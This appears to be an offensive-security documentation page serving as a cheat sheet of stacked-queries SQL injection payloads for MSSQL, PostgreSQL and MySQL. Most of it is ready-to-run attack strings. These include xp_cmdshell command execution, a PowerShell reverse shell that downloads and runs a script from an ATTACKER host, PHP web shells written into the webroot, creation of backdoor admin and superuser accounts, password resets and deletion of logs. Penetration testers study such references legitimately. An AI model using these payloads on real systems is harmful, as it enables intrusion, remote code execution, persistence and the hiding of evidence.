> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Stacked Queries

> Stacked queries SQL injection: execute multiple statements to modify data, create users, and gain RCE.

## Overview

Execute multiple SQL statements separated by `;`. Unlike UNION/error-based, stacked queries can run INSERT, UPDATE, DELETE, and administrative commands. Not all databases/drivers support this.

***

## Support Matrix

| Database   | Supported | Notes                                                                |
| ---------- | --------- | -------------------------------------------------------------------- |
| MSSQL      | Yes       | Full support                                                         |
| PostgreSQL | Yes       | Full support                                                         |
| MySQL      | Depends   | Only with `mysqli_multi_query()` or PDO with `ATTR_EMULATE_PREPARES` |
| SQLite     | Yes       | Via some drivers                                                     |
| Oracle     | No        | Not supported                                                        |

***

## MSSQL

### Execute Commands

```
'; EXEC xp_cmdshell 'whoami'-- -
```

### Enable xp\_cmdshell

```
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -
```

### Create Admin User

```
'; EXEC('net user hacker Password123! /add'); EXEC('net localgroup administrators hacker /add')-- -
```

### Reverse Shell

```
'; EXEC xp_cmdshell 'powershell -c "iex(iwr http://ATTACKER/shell.ps1)"'-- -
```

***

## PostgreSQL

### Command Execution

```
'; CREATE TABLE cmd(output text); COPY cmd FROM PROGRAM 'id';-- -
```

### Create User

```
'; CREATE USER hacker WITH PASSWORD 'pass123' SUPERUSER;-- -
```

### File Write

```
'; COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';-- -
```

***

## MySQL

### Write File

```
'; SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';-- -
```

### Create User

```
'; CREATE USER 'hacker'@'%' IDENTIFIED BY 'pass123'; GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%';-- -
```

***

## Data Manipulation

### Insert Data

```
'; INSERT INTO users (username,password,role) VALUES ('hacker','pass123','admin');-- -
```

### Update Data

```
'; UPDATE users SET role='admin' WHERE username='hacker';-- -
'; UPDATE users SET password='newpass' WHERE username='admin';-- -
```

### Delete Data

```
'; DELETE FROM logs WHERE 1=1;-- -
```

***

## Detection

If second query executes, stacked queries work:

```
'; SELECT SLEEP(5);-- -             # MySQL
'; WAITFOR DELAY '0:0:5';-- -      # MSSQL
'; SELECT pg_sleep(5);-- -         # PostgreSQL
```

***

## Quick Reference

| Database       | Payload                                  |
| -------------- | ---------------------------------------- |
| MSSQL RCE      | `'; EXEC xp_cmdshell 'whoami'-- -`       |
| PostgreSQL RCE | `'; COPY cmd FROM PROGRAM 'id'-- -`      |
| MySQL write    | `'; SELECT ... INTO OUTFILE '/path'-- -` |
| Insert user    | `'; INSERT INTO users VALUES(...)-- -`   |
| Update role    | `'; UPDATE users SET role='admin'-- -`   |

***

## Sources

* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
* [OWASP — SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [SQLmap Wiki — Techniques](https://github.com/sqlmapproject/sqlmap/wiki/Techniques)
